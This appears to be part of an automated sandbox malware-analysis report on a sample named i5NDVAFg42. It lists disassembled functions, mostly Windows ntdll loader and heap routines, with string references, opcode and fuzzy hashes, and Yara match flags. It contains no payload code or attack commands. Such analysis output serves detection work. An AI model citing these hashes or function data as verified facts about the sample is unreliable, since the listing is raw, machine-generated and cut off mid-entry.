                                                              • Instruction ID: 6967e2dbc1c477b37d2a320678e411cf252afe2537cfbbff1682726715d1dfeb
                                                              • Opcode Fuzzy Hash: 13f57eb49439f891e598a3c8edaaffc1e215ff7f106c6a98a78733b45bea7cba
                                                              • Instruction Fuzzy Hash: D1C27D716083419FEB29CF28C885BABFBE5AFC8714F448A2DF98987241D735D845CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0177A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: c3bb5baea54a28f55c2af00a1e21f0ea4f5c009dbcaf3c47c428d6957bd0a6ae
                                                              • Instruction ID: 91b6065c4619dc4e6915d56b9013756e615a1e4caff6a8daafc081d958903a32
                                                              • Opcode Fuzzy Hash: c3bb5baea54a28f55c2af00a1e21f0ea4f5c009dbcaf3c47c428d6957bd0a6ae
                                                              • Instruction Fuzzy Hash: 63A15B719116299BDF32DF68CC88BAAF7B8EF44710F1501E9E909A7250EB359E84CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 017EA10F
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017EA121
                                                              • LdrpCheckModule, xrefs: 017EA117
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 246b0a161e54b28391aaac73d88c8e713e4667a0a525d3e61744301a4030158b
                                                              • Instruction ID: 3881c88019da5216bea090b4f6a89a2c0c0fc9d4e68fa1d548cdb575330b7a7c
                                                              • Opcode Fuzzy Hash: 246b0a161e54b28391aaac73d88c8e713e4667a0a525d3e61744301a4030158b
                                                              • Instruction Fuzzy Hash: F371BC71A002059FDB25DF68C988ABEFBF4EB88704F54456DE802EB255E734EA81CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01790A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: c7f10a5a3393b89268edf673667d39e63371a4ad8abef2ccf1c54868aab1cca4
                                                              • Instruction ID: 464ac4fb48af5d0cbcb0c2cc8600057cd62335403914b1630149a079f93ac504
                                                              • Opcode Fuzzy Hash: c7f10a5a3393b89268edf673667d39e63371a4ad8abef2ccf1c54868aab1cca4
                                                              • Instruction Fuzzy Hash: 9661FE70610305DFDB29CF28D884B6AFBE5FF48308F14859AE4598F286D774E985CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 017F82DE
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017F82E8
                                                              • Failed to reallocate the system dirs string !, xrefs: 017F82D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: 58dbdc0e351d795f634ee47832ccf04ba94fcfca930521ad637b0af094e124c5
                                                              • Instruction ID: 6c08cc84427cd2ce30bc022877521d3ef4faa752e29210d9daaa938b8dc81418
                                                              • Opcode Fuzzy Hash: 58dbdc0e351d795f634ee47832ccf04ba94fcfca930521ad637b0af094e124c5
                                                              • Instruction Fuzzy Hash: FC41F3B1554301ABD722EB68DC88B9BF7E8EF44750F50892AFA54D32A4E770D900CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0183C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0183C1C5
                                                              • PreferredUILanguages, xrefs: 0183C212
                                                              • @, xrefs: 0183C1F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: b1a26ca9096a53071ad479ed56811032aaf03d9227dd50368dd94a1468187b39
                                                              • Instruction ID: 51b83a5eb0478fbc4da4705649ca87902b753e8e2aa347b3c09419b9c03531d5
                                                              • Opcode Fuzzy Hash: b1a26ca9096a53071ad479ed56811032aaf03d9227dd50368dd94a1468187b39
                                                              • Instruction Fuzzy Hash: 7E414272A00219ABDF11DED8C855BEEFBB8AB94704F14416BEA09F7244D7749B448B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01814144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 4d187b1445079272a1e4537c3dbb95c5dce3733c030c3ebf32746416b2f87927
                                                              • Instruction ID: 1357c786e2761fbd1fdf02fb2e7dd0a8ee640190dc00f7e669a9d53dfeea17a9
                                                              • Opcode Fuzzy Hash: 4d187b1445079272a1e4537c3dbb95c5dce3733c030c3ebf32746416b2f87927
                                                              • Instruction Fuzzy Hash: 85412372A00658CBEB26DBE8C844BEDBBBCFF55344F24045AD901EB789DB348A41CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01804755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01804888
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01804899
                                                              • LdrpCheckRedirection, xrefs: 0180488F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: c3744c1695ae59df68cc0aab0f9bbf21762005856e6ade5acb55dab9b390b552
                                                              • Instruction ID: d03a6cc0a43df2a8dcd61a47eb94e3700f72281101730e7387a3fb81c0b5f419
                                                              • Opcode Fuzzy Hash: c3744c1695ae59df68cc0aab0f9bbf21762005856e6ade5acb55dab9b390b552
                                                              • Instruction Fuzzy Hash: AD41B232A846599FDBA3CE5CDC40A26BBE4AF89750B050A5DEF44D7391D731DB00CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01790BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: df2fce1da61bc0003437c9f92a740795e321116e0635dc1b89433502d30ab144
                                                              • Instruction ID: da0180f3f02b05d7141cda7acaf707f3558ad7b2ca31a4e1eac9c9cd4a857564
                                                              • Opcode Fuzzy Hash: df2fce1da61bc0003437c9f92a740795e321116e0635dc1b89433502d30ab144
                                                              • Instruction Fuzzy Hash: 6E11007132410ADFDF29EA18D859F7AF3E8EF4561AF188169F406CB255DB30D844CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 018020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 018020FA
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01802104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 018020F3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 73d7002c2cefb4f6acffa430a223b5035d73256f001665049bbab53f8b4a5b0c
                                                              • Instruction ID: 527b4f2ced2dcf95cfacb0cd5fd21bbd23ff663190f419a25039a57a610c2cd5
                                                              • Opcode Fuzzy Hash: 73d7002c2cefb4f6acffa430a223b5035d73256f001665049bbab53f8b4a5b0c
                                                              • Instruction Fuzzy Hash: 14F0C875640309AFE765E64CCC5AF99B76DEB80B54F50006DFA40B72C5D6F0AB00CA92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: b519b90107834242e6b8fcc80670d1bf1b86d35835ca6fe8503a20e71d07cf08
                                                              • Instruction ID: 05a8c66097b641cd0e1fa56e8fa6a6d99344c2c838caddeb3e8b27f710df4e62
                                                              • Opcode Fuzzy Hash: b519b90107834242e6b8fcc80670d1bf1b86d35835ca6fe8503a20e71d07cf08
                                                              • Instruction Fuzzy Hash: 7F715A71A0014A9FDF01DFA8D998FAEB7F8BF08744F144069E905E7255EA34EE45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017952A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              • Opcode ID: 8703c35cb2a1abc39a50f4b0ca5d6a7fa2c554ee0e361b953ff6852b0a60535d
                                                              • Instruction ID: cefc6b9fc361c8de4914ca5b7fa2add6e95df5a9da4c12b592cf6edc20ddba45
                                                              • Opcode Fuzzy Hash: 8703c35cb2a1abc39a50f4b0ca5d6a7fa2c554ee0e361b953ff6852b0a60535d
                                                              • Instruction Fuzzy Hash: 2D328F705083218BDB25CF19D484B3EFBE1EF98B44F14491EFA959B2A0E734D948CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0178A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 0178AA13
                                                              • LdrResSearchResource Exit, xrefs: 0178AA25
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: 21572418c18fd13b5646abdd8f14b08a005b93104f75266bb76d444cc844353e
                                                              • Instruction ID: e96c524d8cdab7f1a93f678c9571c7de058b806ceaacd616d76840741257b4cb
                                                              • Opcode Fuzzy Hash: 21572418c18fd13b5646abdd8f14b08a005b93104f75266bb76d444cc844353e
                                                              • Instruction Fuzzy Hash: 2EE18E71A40209AFEF22DE99C984BAEFBFABF18310F10446AE901E7241E734D940CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0184A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: b9729dcb1d4d6edc40ef19415d358baa43517ff9bb162d0f29f8a45940a509cc
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 21C1F53124434A9BE728CF28C845B6BBBE5BFD4318F044A2DF696CB291DB75D605CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01780CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ResIdCount less than 2., xrefs: 017DEEC9
                                                              • Failed to retrieve service checksum., xrefs: 017DEE56
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                              • API String ID: 0-863616075
                                                              • Opcode ID: 29b7e1c3b3e6487d7aa75bca9780e2ea2d88cdfdbb6cf2caacf44e896227f0a2
                                                              • Instruction ID: e4fe0d03f1774f77a40834b25b502f5116a0de572d846492d3c8b8421b1a7e6a
                                                              • Opcode Fuzzy Hash: 29b7e1c3b3e6487d7aa75bca9780e2ea2d88cdfdbb6cf2caacf44e896227f0a2
                                                              • Instruction Fuzzy Hash: AAE1F1B19087849FE325CF15C484BABFBE4BB88314F40892EE5999B380DB709949CF57
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFDB92 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT$y:T
                                                              • API String ID: 0-3518590781
                                                              • Opcode ID: f96cae05c0121f8306d0504f36395478f1f6a2f9989950ac87176965e8c58f7b
                                                              • Instruction ID: bbca7eccb2ceb6d0b3d5320c22ed43091dea27bba1bdfe98b5830db06346a678
                                                              • Opcode Fuzzy Hash: f96cae05c0121f8306d0504f36395478f1f6a2f9989950ac87176965e8c58f7b
                                                              • Instruction Fuzzy Hash: 19D17572919B85CFD71ADF38D89AA503FB1F782720708438DCAA1934E2D7382526CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 7e049a62be22ac9b8992a11a72df303c12cd041c145ed807fc51cdfeed449db5
                                                              • Instruction ID: 280add3c7af2532b889a700755552ae61230b4330359a750d8acc729c4e2da08
                                                              • Opcode Fuzzy Hash: 7e049a62be22ac9b8992a11a72df303c12cd041c145ed807fc51cdfeed449db5
                                                              • Instruction Fuzzy Hash: 08615B71E402199FDB24DFA8C844BAEFBB9FB48700F15406DE649EB361DB31A940CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 018243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: fea0bd81a449fde62fc253f7a03f1cc0ff891e68c14e4108d8c49c3d3c5ffda9
                                                              • Instruction ID: 5af8ce1fc70e7c797322d2f884e39d7e9b4023f4c073dd9fa1512532b045ce11
                                                              • Opcode Fuzzy Hash: fea0bd81a449fde62fc253f7a03f1cc0ff891e68c14e4108d8c49c3d3c5ffda9
                                                              • Instruction Fuzzy Hash: 945149B1E0062DAEDF12DFA9CD84AEEBBB8EB44754F100529E611F7291D6309E45CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • kLsE, xrefs: 01780540
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0178063D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 88f71ad92e012d27f5c534e19caeeb5f721fa8b872adea97da17291fd84f58e3
                                                              • Instruction ID: 9ee0d0238aa5bfee99ed27bda284541d17df96b6a30e7492d3897a89a3707da8
                                                              • Opcode Fuzzy Hash: 88f71ad92e012d27f5c534e19caeeb5f721fa8b872adea97da17291fd84f58e3
                                                              • Instruction Fuzzy Hash: E851AF716447428FD724FF68C544AA7FBE4AF84314F24483EFAAA87241E770D549CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0178A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0178A309
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0178A2FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: a27d374f3ed0e8aabadb1d8cbacb2e77e74426c89f66d36e46a04c10f4b15aaf
                                                              • Instruction ID: 893411523032e6cfa228e892066b9667228e0c976c58d238d8aaef42333f915d
                                                              • Opcode Fuzzy Hash: a27d374f3ed0e8aabadb1d8cbacb2e77e74426c89f66d36e46a04c10f4b15aaf
                                                              • Instruction Fuzzy Hash: 9B41AF30A44649DBDB22DF6DC844B6DFBF4FF84700F2440AAE904DB692E6B5D940CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: 683500319175f583c6216c6bf54150a070538265f8a207a2785354a24188537a
                                                              • Instruction ID: a74925e28701cbf94ea32a6e28eb07aea58ba4ec6b309f65326a83bf1a15012e
                                                              • Opcode Fuzzy Hash: 683500319175f583c6216c6bf54150a070538265f8a207a2785354a24188537a
                                                              • Instruction Fuzzy Hash: DB01D1B2240700AFE311EF14CD89B56BBF8EB94B19F018939A648C7190E774E904CB46
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0178C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: MUI
                                                              • API String ID: 0-1339004836
                                                              • Opcode ID: 48b1eae1eb1ec33d185252eac242d3e4d2bef366f35020d492f043ee0225f939
                                                              • Instruction ID: 145e0f662f928177b266a18cbfccbe0f376c7290334c18bd5d4cdb382f388adc
                                                              • Opcode Fuzzy Hash: 48b1eae1eb1ec33d185252eac242d3e4d2bef366f35020d492f043ee0225f939
                                                              • Instruction Fuzzy Hash: 8B825C75E802198FEB25EFA9C884BEDFBB1BF48310F148169E919AB395D7309D41CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017D2F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: P`vRbv
                                                              • API String ID: 0-2392986850
                                                              • Opcode ID: 37f5c6591723126868becf9b95c925518e3c6f178ac5297e05f1953fb4e4b963
                                                              • Instruction ID: 42b9504141e4a9d1de740f9a872fae59f3898cf403aeeec67c9126afcec365ed
                                                              • Opcode Fuzzy Hash: 37f5c6591723126868becf9b95c925518e3c6f178ac5297e05f1953fb4e4b963
                                                              • Instruction Fuzzy Hash: F042F5F5D0425EAAEF29CFACD8486BDFFB1BF05310F58805AE541AB281D7358A81C752
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0182CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                              • Instruction ID: d4700134b16e8903f9dca147ea5210738a4652650ed9416b93cd03dd4a8f307f
                                                              • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                              • Instruction Fuzzy Hash: 3E621770D012288FCB98DF9AC4D4AADB7B2FF8C311F648199E9816B745C7356A16CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017A2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 13372ddb4d783ba68dd454bd73f733f87dfbe0f27b18d0654371ace287be63c5
                                                              • Instruction ID: 5a952aaf33e0883d19a3d2b8f369496d9d2fc405adb982cabea9c085017a0237
                                                              • Opcode Fuzzy Hash: 13372ddb4d783ba68dd454bd73f733f87dfbe0f27b18d0654371ace287be63c5
                                                              • Instruction Fuzzy Hash: 3EF19F71608742CFDB25CF28C484A6BFBE1BFC8710F844A6DE99987241DB34E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFDEB9 Relevance: 1.7, Strings: 1, Instructions: 424COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: KlT
                                                              • API String ID: 0-2244822001
                                                              • Opcode ID: 6a2dd3f9820207b0eda145558f6824c380e8cfca6c7da1d63bf116c73ff7aca2
                                                              • Instruction ID: 5460d23faf0637900f032795ad21763b9bc7850cb6617570254399726b4393c5
                                                              • Opcode Fuzzy Hash: 6a2dd3f9820207b0eda145558f6824c380e8cfca6c7da1d63bf116c73ff7aca2
                                                              • Instruction Fuzzy Hash: 28127372819B85CFD719DF38D99AA513FB2F782720B08439DCAA2930D2DB342516CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CE9E60 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                              Download Yara Rule
                                                              Strings
